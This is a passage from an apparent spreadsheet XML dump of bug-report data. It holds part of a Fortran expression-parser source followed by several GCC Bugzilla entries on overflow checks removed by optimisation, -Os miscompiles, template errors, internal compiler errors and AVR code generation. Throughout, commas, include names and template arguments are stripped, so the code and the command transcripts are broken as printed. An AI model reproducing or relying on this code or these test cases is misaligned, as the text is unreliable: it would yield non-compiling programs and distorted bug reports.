       IF (n &gt; 0) THEN                                       ! Check for math function
          j = j+LEN_TRIM(Funcs(n))
          IF (j &gt; lFunc) CALL ParseErrMsg (j FuncStr 'Missing function argument')
          c = Func(j:j)
          IF (c /= '(') CALL ParseErrMsg (j FuncStr 'Missing opening parenthesis')
       END IF
       IF (c == '(') THEN                                    ! Check for opening parenthesis
          ParCnt = ParCnt+1
          j = j+1
          CYCLE step
       END IF
       IF (SCAN(c'0123456789.') &gt; 0) THEN                   ! Check for number
          r = RealNum (Func(j:)ibinerr)
          IF (err) CALL ParseErrMsg (j FuncStr 'Invalid number format:  '//Func(j+ib-1:j+in-2))
          j = j+in-1
          IF (j &gt; lFunc) EXIT
          c = Func(j:j)
       ELSE                                                  ! Check for variable
          n = VariableIndex (Func(j:)Varibin)
          IF (n == 0) CALL ParseErrMsg (j FuncStr 'Invalid element: '//Func(j+ib-1:j+in-2))
          j = j+in-1
          IF (j &gt; lFunc) EXIT
          c = Func(j:j)
       END IF
       DO WHILE (c == ')')                                   ! Check for closing parenthesis
          ParCnt = ParCnt-1
          IF (ParCnt &lt; 0) CALL ParseErrMsg (j FuncStr 'Mismatched parenthesis')
          IF (Func(j-1:j-1) == '(') CALL ParseErrMsg (j-1 FuncStr 'Empty parentheses')
          j = j+1
          IF (j &gt; lFunc) EXIT
          c = Func(j:j)
       END DO
       !-- -------- --------- --------- --------- --------- --------- --------- -------
       ! Now we have a legal operand: A legal operator or end of string must follow
       !-- -------- --------- --------- --------- --------- --------- --------- -------
       IF (j &gt; lFunc) EXIT
       IF (ANY(c == Ops)) THEN                               ! Check for multiple operators
          IF (j+1 &gt; lFunc) CALL ParseErrMsg (j FuncStr)
          IF (ANY(Func(j+1:j+1) == Ops)) CALL ParseErrMsg (j+1 FuncStr 'Multiple operators')
       ELSE                                                  ! Check for next operand
          CALL ParseErrMsg (j FuncStr 'Missing operator')
       END IF
       !-- -------- --------- --------- --------- --------- --------- --------- -------
       ! Now we have an operand and an operator: the next loop will check for another
       ! operand (must appear)
       !-- -------- --------- --------- --------- --------- --------- --------- -------
       j = j+1
    END DO step
    IF (ParCnt &gt; 0) CALL ParseErrMsg (j FuncStr 'Missing )')
  END SUBROUTINE CheckSyntax
  !
  FUNCTION EvalErrMsg () RESULT (msg)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Return error message
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=*) DIMENSION(4) PARAMETER :: m = (/ 'Division by zero                ' &amp;
                                                         'Argument of SQRT negative       ' &amp;
                                                         'Argument of LOG negative        ' &amp;
                                                         'Argument of ASIN or ACOS illegal' /)
    CHARACTER (LEN=LEN(m))                     :: msg
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IF (EvalErrType  SIZE(m)) THEN
       msg = ''
    ELSE
       msg = m(EvalErrType)
    ENDIF
  END FUNCTION EvalErrMsg
  !
  SUBROUTINE ParseErrMsg (j FuncStr Msg)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! !print error message and terminate program
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER                     INTENT(in) :: j
    CHARACTER (LEN=*)           INTENT(in) :: FuncStr       ! Original function string
    CHARACTER (LEN=*) OPTIONAL INTENT(in) :: Msg
    INTEGER                                 :: k
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IF (PRESENT(Msg)) THEN
       WRITE(**) '*** Error in syntax of function string: '//Msg
    ELSE
       WRITE(**) '*** Error in syntax of function string:'
    ENDIF
    WRITE(**)
    WRITE(*'(A)') ' '//FuncStr
    DO k=1ipos(j)
       WRITE(*'(A)'ADVANCE='NO') ' '                       ! Advance to the jth position
    END DO
    WRITE(*'(A)') '?'
    STOP
  END SUBROUTINE ParseErrMsg
  !
  FUNCTION OperatorIndex (c) RESULT (n)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Return operator index
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=1) INTENT(in) :: c
    INTEGER(is)                   :: nj
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    n = 0
    DO j=cAddcPow
       IF (c == Ops(j)) THEN
          n = j
          EXIT
       END IF
    END DO
  END FUNCTION OperatorIndex
  !
  FUNCTION MathFunctionIndex (str) RESULT (n)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Return index of math function beginnig at 1st position of string str
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=*) INTENT(in) :: str
    INTEGER(is)                   :: nj
    INTEGER                       :: k
    CHARACTER (LEN=LEN(Funcs))    :: fun
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    n = 0
    DO j=cAbscAtan                                          ! Check all math functions
       k = MIN(LEN_TRIM(Funcs(j)) LEN(str))
       CALL LowCase (str(1:k) fun)
       IF (fun == Funcs(j)) THEN                             ! Compare lower case letters
          n = j                                              ! Found a matching function
          EXIT
       END IF
    END DO
  END FUNCTION MathFunctionIndex
  !
  FUNCTION VariableIndex (str Var ibegin inext) RESULT (n)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Return index of variable at begin of string str (returns 0 if no variable found)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=*)               INTENT(in) :: str       ! String
    CHARACTER (LEN=*) DIMENSION(:) INTENT(in) :: Var       ! Array with variable names
    INTEGER(is)                                 :: n         ! Index of variable
    INTEGER OPTIONAL              INTENT(out) :: ibegin &amp; ! Start position of variable name
                                                   inext     ! Position of character after name
    INTEGER                                     :: jibinlstr
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    n = 0
    !print* IN VariableIndex: str Var! ibegin inext
    lstr = LEN_TRIM(str)
    IF (lstr &gt; 0) THEN
       DO ib=1lstr                                          ! Search for first character in str
          IF (str(ib:ib) /= ' ') EXIT                        ! When lstr&gt;0 at least 1 char in str
       END DO
       DO in=iblstr                                         ! Search for name terminators
          IF (SCAN(str(in:in)'+-*/^) ') &gt; 0) EXIT
       END DO
       DO j=1SIZE(Var)
          IF (str(ib:in-1) == Var(j)) THEN
             n = j                                           ! Variable name found
             EXIT
          END IF
       END DO
    END IF
    IF (PRESENT(ibegin)) ibegin = ib
    IF (PRESENT(inext))  inext  = in
  END FUNCTION VariableIndex
  !
  SUBROUTINE RemoveSpaces (str)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Remove Spaces from string remember positions of characters in old string
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=*) INTENT(inout) :: str
    INTEGER                          :: klstr
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    lstr = LEN_TRIM(str)
    ipos = (/ (kk=1lstr) /)
    k = 1
    DO WHILE (str(k:lstr) /= ' ')
       IF (str(k:k) == ' ') THEN
          str(k:lstr)  = str(k+1:lstr)//' '                  ! Move 1 character to left
          ipos(k:lstr) = (/ ipos(k+1:lstr) 0 /)             ! Move 1 element to left
          k = k-1
       END IF
       k = k+1
    END DO
  END SUBROUTINE RemoveSpaces
  !
  SUBROUTINE Replace (cacbstr)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Replace ALL appearances of character set ca in string str by character set cb
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=*)       INTENT(in) :: ca
    CHARACTER (LEN=LEN(ca)) INTENT(in) :: cb                ! LEN(ca) must be LEN(cb)
    CHARACTER (LEN=*)    INTENT(inout) :: str
    INTEGER                             :: jlca
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    lca = LEN(ca)
    DO j=1LEN_TRIM(str)-lca+1
       IF (str(j:j+lca-1) == ca) str(j:j+lca-1) = cb
    END DO
  END SUBROUTINE Replace
  !
  SUBROUTINE Compile (i F Var)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Compile i-th function string F into bytecode
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER                         INTENT(in) :: i         ! Function identifier
    CHARACTER (LEN=*)               INTENT(in) :: F         ! Function string
    CHARACTER (LEN=*) DIMENSION(:) INTENT(in) :: Var       ! Array with variable names
    INTEGER                                     :: istat
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    !print* IN Compile i F Var
    IF (ASSOCIATED(Comp(i)%ByteCode)) DEALLOCATE ( Comp(i)%ByteCode &amp;
                                                   Comp(i)%Immed    &amp;
                                                   Comp(i)%Stack     )
    Comp(i)%ByteCodeSize = 0
    Comp(i)%ImmedSize    = 0
    Comp(i)%StackSize    = 0
    Comp(i)%StackPtr     = 0
    CALL CompileSubstr (iF1LEN_TRIM(F)Var)               ! Compile string to determine size
    ALLOCATE ( Comp(i)%ByteCode(Comp(i)%ByteCodeSize) &amp;
               Comp(i)%Immed(Comp(i)%ImmedSize)       &amp;
               Comp(i)%Stack(Comp(i)%StackSize)       &amp;
               STAT = istat                            )
    IF (istat /= 0) THEN
       WRITE(**) '*** Parser error: Memmory allocation for byte code failed'
       STOP
    ELSE
       Comp(i)%ByteCodeSize = 0
       Comp(i)%ImmedSize    = 0
       Comp(i)%StackSize    = 0
       Comp(i)%StackPtr     = 0
       CALL CompileSubstr (iF1LEN_TRIM(F)Var)            ! Compile string into bytecode
    END IF
    !
  END SUBROUTINE Compile
  !
  SUBROUTINE AddCompiledByte (i b)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Add compiled byte to bytecode
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER     INTENT(in) :: i                             ! Function identifier
    INTEGER(is) INTENT(in) :: b                             ! Value of byte to be added
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    Comp(i)%ByteCodeSize = Comp(i)%ByteCodeSize + 1
    IF (ASSOCIATED(Comp(i)%ByteCode)) Comp(i)%ByteCode(Comp(i)%ByteCodeSize) = b
  END SUBROUTINE AddCompiledByte
  !
  FUNCTION MathItemIndex (i F Var) RESULT (n)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Return math item index if item is real number enter it into Comp-structure
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER                         INTENT(in) :: i         ! Function identifier
    CHARACTER (LEN=*)               INTENT(in) :: F         ! Function substring
    CHARACTER (LEN=*) DIMENSION(:) INTENT(in) :: Var       ! Array with variable names
    INTEGER(is)                                 :: n         ! Byte value of math item
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    n = 0
    !print* IN MathItemIndex i F Var
    IF (SCAN(F(1:1)'0123456789.') &gt; 0) THEN                 ! Check for begin of a number
       Comp(i)%ImmedSize = Comp(i)%ImmedSize + 1
       IF (ASSOCIATED(Comp(i)%Immed)) Comp(i)%Immed(Comp(i)%ImmedSize) = RealNum (F)
       n = cImmed
    ELSE                                                     ! Check for a variable
       !print* B4 VariableIndex  F Var
       n = VariableIndex (F Var)
       IF (n &gt; 0) n = VarBegin+n-1
    END IF
  END FUNCTION MathItemIndex
  !
  FUNCTION CompletelyEnclosed (F b e) RESULT (res)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Check if function substring F(b:e) is completely enclosed by a pair of parenthesis
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=*) INTENT(in) :: F                       ! Function substring
    INTEGER           INTENT(in) :: be                     ! First and last pos. of substring
    LOGICAL                       :: res
    INTEGER                       :: jk
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    res=.false.
    IF (F(b:b) == '(' .AND. F(e:e) == ')') THEN
       k = 0
       DO j=b+1e-1
          IF     (F(j:j) == '(') THEN
             k = k+1
          ELSEIF (F(j:j) == ')') THEN
             k = k-1
          END IF
          IF (k &lt; 0) EXIT
       END DO
       IF (k == 0) res=.true.                                ! All opened parenthesis closed
    END IF
  END FUNCTION CompletelyEnclosed
  !
  RECURSIVE SUBROUTINE CompileSubstr (i F b e Var)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Compile i-th function string F into bytecode
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER                         INTENT(in) :: i         ! Function identifier
    CHARACTER (LEN=*)               INTENT(in) :: F         ! Function substring
    INTEGER                         INTENT(in) :: be       ! Begin and end position substring
    CHARACTER (LEN=*) DIMENSION(:) INTENT(in) :: Var       ! Array with variable names
    INTEGER(is)                                 :: n
    INTEGER                                     :: b2jkio
    CHARACTER (LEN=*)                PARAMETER :: calpha = 'abcdefghijklmnopqrstuvwxyz'// &amp;
                                                            'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Check for special cases of substring
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    !print* IN CompileSubstr i F b e Var
    IF     (F(b:b) == '+') THEN                              ! Case 1: F(b:e) = '+...'
!      WRITE(**)'1. F(b:e) = +...'
       CALL CompileSubstr (i F b+1 e Var)
       RETURN
    ELSEIF (CompletelyEnclosed (F b e)) THEN               ! Case 2: F(b:e) = '(...)'
!      WRITE(**)'2. F(b:e) = (...)'
       CALL CompileSubstr (i F b+1 e-1 Var)
       RETURN
    ELSEIF (SCAN(F(b:b)calpha) &gt; 0) THEN
       n = MathFunctionIndex (F(b:e))
       IF (n &gt; 0) THEN
          b2 = b+INDEX(F(b:e)'(')-1
          IF (CompletelyEnclosed(F b2 e)) THEN             ! Case 3: F(b:e) = 'fcn(...)'
!            WRITE(**)'3. F(b:e) = fcn(...)'
             CALL CompileSubstr(i F b2+1 e-1 Var)
             CALL AddCompiledByte (i n)
             RETURN
          END IF
       END IF
    ELSEIF (F(b:b) == '-') THEN
       IF (CompletelyEnclosed (F b+1 e)) THEN              ! Case 4: F(b:e) = '-(...)'
!         WRITE(**)'4. F(b:e) = -(...)'
          CALL CompileSubstr (i F b+2 e-1 Var)
          CALL AddCompiledByte (i cNeg)
          RETURN
       ELSEIF (SCAN(F(b+1:b+1)calpha) &gt; 0) THEN
          n = MathFunctionIndex (F(b+1:e))
          IF (n &gt; 0) THEN
             b2 = b+INDEX(F(b+1:e)'(')
             IF (CompletelyEnclosed(F b2 e)) THEN          ! Case 5: F(b:e) = '-fcn(...)'
!               WRITE(**)'5. F(b:e) = -fcn(...)'
                CALL CompileSubstr(i F b2+1 e-1 Var)
                CALL AddCompiledByte (i n)
                CALL AddCompiledByte (i cNeg)
                RETURN
             END IF
          END IF
       ENDIF
    END IF
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Check for operator in substring: check only base level (k=0) exclude expr. in ()
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    DO io=cAddcPow                                          ! Increasing priority +-*/^
       k = 0
       DO j=eb-1
          IF     (F(j:j) == ')') THEN
             k = k+1
          ELSEIF (F(j:j) == '(') THEN
             k = k-1
          END IF
          IF (k == 0 .AND. F(j:j) == Ops(io) .AND. IsBinaryOp (j F)) THEN
             IF (ANY(F(j:j) == Ops(cMul:cPow)) .AND. F(b:b) == '-') THEN ! Case 6: F(b:e) = '-...Op...' with Op &gt; -
!               WRITE(**)'6. F(b:e) = -...Op... with Op &gt; -'
                CALL CompileSubstr (i F b+1 e Var)
                CALL AddCompiledByte (i cNeg)
                RETURN
             ELSE                                                        ! Case 7: F(b:e) = '...BinOp...'
!               WRITE(**)'7. Binary operator'F(j:j)
                CALL CompileSubstr (i F b j-1 Var)
                CALL CompileSubstr (i F j+1 e Var)
                CALL AddCompiledByte (i OperatorIndex(Ops(io)))
                Comp(i)%StackPtr = Comp(i)%StackPtr - 1
                RETURN
             END IF
          END IF
       END DO
    END DO
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Check for remaining items i.e. variables or explicit numbers
    !----- -------- --------- --------- --------- ---</t>
  </si>
  <si>
    <t>victor.prosolin</t>
  </si>
  <si>
    <t>GCC-30477</t>
  </si>
  <si>
    <t>Integer Overflow detection code optimised away -fwrapv broken</t>
  </si>
  <si>
    <t>Bug originally reported against gcc 4.1.1 by Felix von Leitner
found at http://blog.fefe.de/?ts=bb5517a4 (filed as PR #30475).
This is sort of a follow-up bug report but with a
different _focus_ and a different _aim_ namely the
gcc developers especially Andrew Pinski to provide
a patch against older gcc versions to vendors that
wish to or must continue to use them which unbreaks
the inability of -fwrapv to disable gcc optimising
away code often used in security checks added to an
existing legacy code base. These patches should be
provided publicly so that any operating system ven-
dor who uses gcc2 or gcc3 can pick them up because
it is not MirBSD specific.
I found out that gcc 3.4.6 (MirBSD Propolice) and both
gcc 2.95 and 3.4.3 on DragonFly BSD are vulnerable as
well but did not want to report that because they are
heavily patched against the FSF version.
However Andrew Pinski writes in the following comment:
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30475#c2
That adding -fwrapv to the command line should fix this
important security issue. This however does not work
for me on gcc 3.4.6 (MirBSD of course) but I've got a
shell account on a Debian GNU/Linux 4.0 box whose sy-
stem gcc 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)
indeed suppresses this optimisation with -fwrapv.
I then downloaded gcc-core-3.4.6.tar.gz (the pristine
source) extracted and compiled it on that Debian box.
tglaser@hephaistos:~/test $ bin/bin/gcc -v
Reading specs from /home/t/tglaser/test/bin/lib/gcc/i686-pc-linux-gnu/3.4.6/specs
Configured with: ../gcc-3.4.6/configure --prefix=/home/t/tglaser/test/bin --enable-languages=c --disable-nls --disable-shared
Thread model: posix
gcc version 3.4.6
tglaser@hephaistos:~/test $ rm -f a.out bin/bin/gcc -O0 int.c &amp;&amp; ./a.out
200 100
a.out: int.c:4: foo: Assertion `a+100 &gt; a' failed.
Aborted
134|tglaser@hephaistos:~/test $ rm -f a.out bin/bin/gcc -O1 int.c &amp;&amp; ./a.out
200 100
-2147483549 2147483647
255|tglaser@hephaistos:~/test $ rm -f a.out bin/bin/gcc -O1 -fwrapv int.c &amp;&amp; ./a.out
200 100
-2147483549 2147483647
255|tglaser@hephaistos:~/test $ cat int.c
#include 
int foo(int a) {
  assert(a+100 &gt; a)
  printf(%d %d\na+100a)
  return a
}
int main() {
  foo(100)
  foo(0x7fffffff)
}
tglaser@hephaistos:~/test $ rm -f a.out bin/bin/gcc -Os -fwrapv int.c &amp;&amp; ./a.out 
200 100
-2147483549 2147483647</t>
  </si>
  <si>
    <t>GCC-59387</t>
  </si>
  <si>
    <t>[4.9 Regression] wrong code (hangs) at -Os on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux at -Os (but not at the other optimization levels) in both 32-bit and 64-bit modes. 
This is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.9.0 20131204 (experimental) [trunk revision 205673] (GCC) 
$ 
$ gcc-trunk -O1 small.c a.out
$ gcc-trunk -O2 small.c a.out
$ gcc-4.8 -Os small.c a.out
$ 
$ gcc-trunk -Os small.c
$ a.out
^C
$ 
-------------------------
int a *d **e = 
char c
struct
{
  int f1
} b
int
main ()
{
  for (a = -19 a a++)
    {
      for (b.f1 = 0 b.f1 &lt; 24 b.f1++)
	c-- 
      *e = 
      if (!d)
	return 0
    }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-60</t>
  </si>
  <si>
    <t>partial template specialization prevents gcc from seeing ordinary template of the same class.</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Sun 2 Jan 2000 16:40:02 -0700 (MST)
 Original-Message-ID: 
 Due to the size of the code that provokes the bug I have put in an
   attached bzip2 tarball along with the .s and .ii files created by g++
   -v -save -temps. 
 [Reduced to only .cc file since .ii file and assembler output are
 not needed - MvL]
Release:
2.95.2
How-To-Repeat:
#define BUG
template
  class normal_iterator
  {
  public:
    normal_iterator()
    normal_iterator(Ptr const
    Ptr m_ptr
  }
template
  normal_iterator::
  normal_iterator():m_ptr(0){}
template
  normal_iterator::
  normal_iterator(Ptr const&amp; _ptr):m_ptr(_ptr){}
  class Sequence
  {
  public:
    //iterator and const_iterator must be of templated type 
    //  typedef int* iterator will not provoke the bug.
    typedef normal_iterator iterator
    typedef normal_iterator const_iterator
    inline iterator begin()
    inline const_iterator begin()const
    int m_element
  }
  inline
  Sequence::iterator
  Sequence::
  begin()
  {
    return(
  }
  inline
  Sequence::const_iterator
  Sequence::
  begin()const
  {
    return(
  }
template class Checked_container
template class Basic_checked_iterator
template
  class Basic_checked_iterator
  {
  public:
    typedef Checked_container Container_type
    typedef Basic_checked_iterator Self
    Basic_checked_iterator(Unchecked_iterator const
  }
template
  Basic_checked_iterator::
  Basic_checked_iterator(Unchecked_iterator const&amp; _current_iterator){}
/*
    If BUG is defined compiling this code produces:
$g++ -v -save-temps -g -Wall partial_specialization_clouds_availible_template_function_bug.cc
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs
gcc version 2.95.2 19991024 (release)
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../i686-pc-linux-gnu/include
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cc1plus partial_specialization_clouds_availible_template_function_bug.ii -quiet -dumpbase partial_specialization_clouds_availible_template_function_bug.cc -g -Wall -version -o partial_specialization_clouds_availible_template_function_bug.s
GNU C++ version 2.95.2 19991024 (release) (i686-pc-linux-gnu) compiled by GNU C version 2.95.2 19991024 (release).
partial_specialization_clouds_availible_template_function_bug.cc: In method `class Basic_checked_iterator &gt; Checked_container::begin()':
partial_specialization_clouds_availible_template_function_bug.cc:159:   instantiated from here
partial_specialization_clouds_availible_template_function_bug.cc:144: no matching function for call to `Basic_checked_iterator &gt;::Basic_checked_iterator (normal_iterator)'
partial_specialization_clouds_availible_template_function_bug.cc:120: candidates are: Basic_checked_iterator &gt;::Basic_checked_iterator(const normal_iterator &amp;)
partial_specialization_clouds_availible_template_function_bug.cc:66:                 Basic_checked_iterator &gt;::Basic_checked_iterator(const Basic_checked_iterator &gt; &amp;)
partial_specialization_clouds_availible_template_function_bug.cc:144: warning: control reaches end of non-void function `Checked_container::begin()'
 The problem is that line 64 *does* in fact declare a matching
    templated constructor and if BUG is undefine gcc 2.95.2 finds
    and uses it. 
*/
#if defined(BUG)
template
  class Basic_checked_iterator
  {
  public:
    typedef typename Container::const_iterator Unchecked_const_iterator
    typedef Checked_container const Container_type
    typedef Basic_checked_iterator Self
    Basic_checked_iterator(Unchecked_const_iterator const
  }
template
  Basic_checked_iterator::
  Basic_checked_iterator(typename Container::const_iterator const&amp; _current_iterator){}
#endif /* defined(BUG) */
template
  class Checked_container
  {
  public:
    typedef Basic_checked_iterator iterator
    typedef Basic_checked_iterator const_iterator
    inline iterator begin()
    inline const_iterator begin()const
    Container container
  }
template
  inline
  Checked_container::iterator
  Checked_container::
  begin()
  {
    return iterator(container.begin())
  }
template
  inline
  Checked_container::const_iterator
  Checked_container::
  begin()const
  {
    return const_iterator(container.begin())
  }
int main()
  {
    Checked_container c
    c.begin()
    return(0)
  }</t>
  </si>
  <si>
    <t>GCC-14980</t>
  </si>
  <si>
    <t>[4.0 Regression] [unit-at-a-time] complex_io.cc:69: error: Inlined_to pointer is set but no predecesors found--causes ICE</t>
  </si>
  <si>
    <t>Sigh another bootstrap problem on hppa64-hp-hpux11:
/xxx/gnu/gcc-3.3/objdir/gcc/xgcc -shared-libgcc -B/xxx/gnu/gcc-3.3/objdir/gcc/ -
nostdinc++ -L/xxx/gnu/gcc-3.3/objdir/hppa64-hp-hpux11.11/libstdc++-v3/src -L/xxx
/gnu/gcc-3.3/objdir/hppa64-hp-hpux11.11/libstdc++-v3/src/.libs -B/opt/gnu64/gcc/
gcc-3.5.0-gnu-ld/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-3.5.0-gnu-ld/hppa
64-hp-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-3.5.0-gnu-ld/hppa64-hp-hpux11.1
1/include -isystem /opt/gnu64/gcc/gcc-3.5.0-gnu-ld/hppa64-hp-hpux11.11/sys-inclu
de -I/xxx/gnu/gcc-3.3/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/hppa64-hp-
hpux11.11 -I/xxx/gnu/gcc-3.3/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include -I/
xxx/gnu/gcc-3.3/gcc/libstdc++-v3/libsupc++ -O2 -g -O2 -g -O2 -fno-implicit-templ
ates -Wall -W -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffun
ction-sections -fdata-sections -c ../../../../gcc/libstdc++-v3/src/complex_io.cc
  -fPIC -DPIC -o .libs/complex_io.o
../../../../gcc/libstdc++-v3/src/complex_io.cc:69: error: Inlined_to pointer is 
set but no predecesors found
std::allocator::allocator(conststd::allocator&amp;) [with _Tp = char
]/530: (inline copy in std::basic_ostringstream::basic_
ostringstream(std::_Ios_Openmode) [with _CharT = char _Traits = std::char_trait
s _Alloc = std::allocator]/467) 24 insns (7 after inlining) needed 
inlinable
  called by: 
  calls: 
../../../../gcc/libstdc++-v3/src/complex_io.cc:69: internal compiler error: veri
fy_cgraph_node failed.</t>
  </si>
  <si>
    <t>GCC-51516</t>
  </si>
  <si>
    <t>[trans-mem] problem with TM clone aliases</t>
  </si>
  <si>
    <t>Created attachment 26060
patch for trans-mem.c
PR51347 shows up a problem due to the TM IPA rework.
Indeed an alias can get called but tm cg data are in the parent of the alias. So it ends up to calls _ITM_getTMCloneOrIrrevocable for the alias which is wrong.
Patch attached with testcase.
Bootstrapped and regtested.
http://gcc.gnu.org/ml/gcc-patches/2011-12/msg00225.html
Patrick Marlier.</t>
  </si>
  <si>
    <t>GCC-55032</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] Internal compiler error: in strip_typedefs at cp/tree.c:1199</t>
  </si>
  <si>
    <t>Some variations of bug #53989 still seem to exist (or gcc 4.7.2 does not contain a complete fix for that bug).
$ cat Test.cpp
template
struct vec3t {
  T c[3]
}
typedef vec3t vec3
class Bounds {
  public:
    Bounds(const vec3 bb[2])
    void foo(const vec3  }
}
template
void work(T
void foo() {
  vec3 bb[2]
  work(bb)
}
$ g++ -Wall -c Test.cpp
Test.cpp: In member function 'void Bounds::foo(const vec3&amp;)':
Test.cpp:11:38: warning: statement has no effect [-Wunused-value]
Test.cpp: In function 'void foo()':
Test.cpp:19:10: internal compiler error: in strip_typedefs at cp/tree.c:1199
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/opt/gcc-4.7.2/libexec/gcc/x86_64-unknown-linux-gnu/4.7.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/opt/gcc-4.7.2 --enable-languages=cc++fortran --disable-multilib
Thread model: posix
gcc version 4.7.2 (GCC)</t>
  </si>
  <si>
    <t>bruno-gcc</t>
  </si>
  <si>
    <t>GCC-38718</t>
  </si>
  <si>
    <t>some simplifiers for elemental intrinsics missing required for init expressions</t>
  </si>
  <si>
    <t>The elemental intrinsic functions listed below lack simplifiers to make them usable in initialization expressions:
  DREAL          (GNU extension)
  ERFC_SCALED    (F2008)
  IS_IOSTAT_END  (F2003)
  IS_IOSTAT_EOR  (F2003)
  ISNAN          (GNU extension)
  LSHIFT         (GNU extension)
  MERGE          (F95)
  RSHIFT         (GNU extension)
Probably only ERFC_SCALED and MERGE are of real significance.
Valid code example that's currently rejected:
$&gt; cat merge.f90
  INTEGER PARAMETER :: k = selected_real_kind (precision (0.0_8) + 1)
  INTEGER PARAMETER :: nbytes = MERGE(48 32 k == 16)
  INTEGER PARAMETER :: n = nbytes / KIND(n) + 1
END
merge.f90:3.38:
      INTEGER PARAMETER :: n = nbytes / KIND(n) + 1
                                      1
Error: Function 'nbytes' in initialization expression at (1) must be an intrinsic or a specification function</t>
  </si>
  <si>
    <t>GCC-19565</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] g++ does not warn about overflow in conversion but gcc does</t>
  </si>
  <si>
    <t>g++ does not warn if there occurs an overflow in conversion. For instance gcc    
does not warn about  
  char a = 1024    
but gcc does.</t>
  </si>
  <si>
    <t>GCC-59174</t>
  </si>
  <si>
    <t>[avr] Suboptimal multiplication when indexing an array</t>
  </si>
  <si>
    <t>When indexing an array gcc will sometimes perform a multiplication using shifts and adds instead of using the more efficient multiplication instructions. This program demonstrates the issue.
#include 
struct Foo { char a[12] } foo[10]
struct Foo * test (uint8_t i) { return  }
Compile with:
avr-gcc -mmcu=atmega2560 -O2 -S test.c -o -
Result:
test:
        mov r18r24
        ldi r190
        movw r24r18
        lsl r24
        rol r25
        add r24r18
        adc r25r19
        lsl r24
        rol r25
        lsl r24
        rol r25
        subi r24lo8(-(foo))
        sbci r25hi8(-(foo))
        ret
On the other hand if the struct size is changed to 13 much more efficient assembly is produced:
test:
        ldi r18lo8(13)
        mul r24r18
        movw r24r0
        clr __zero_reg__
        subi r24lo8(-(foo))
        sbci r25hi8(-(foo))
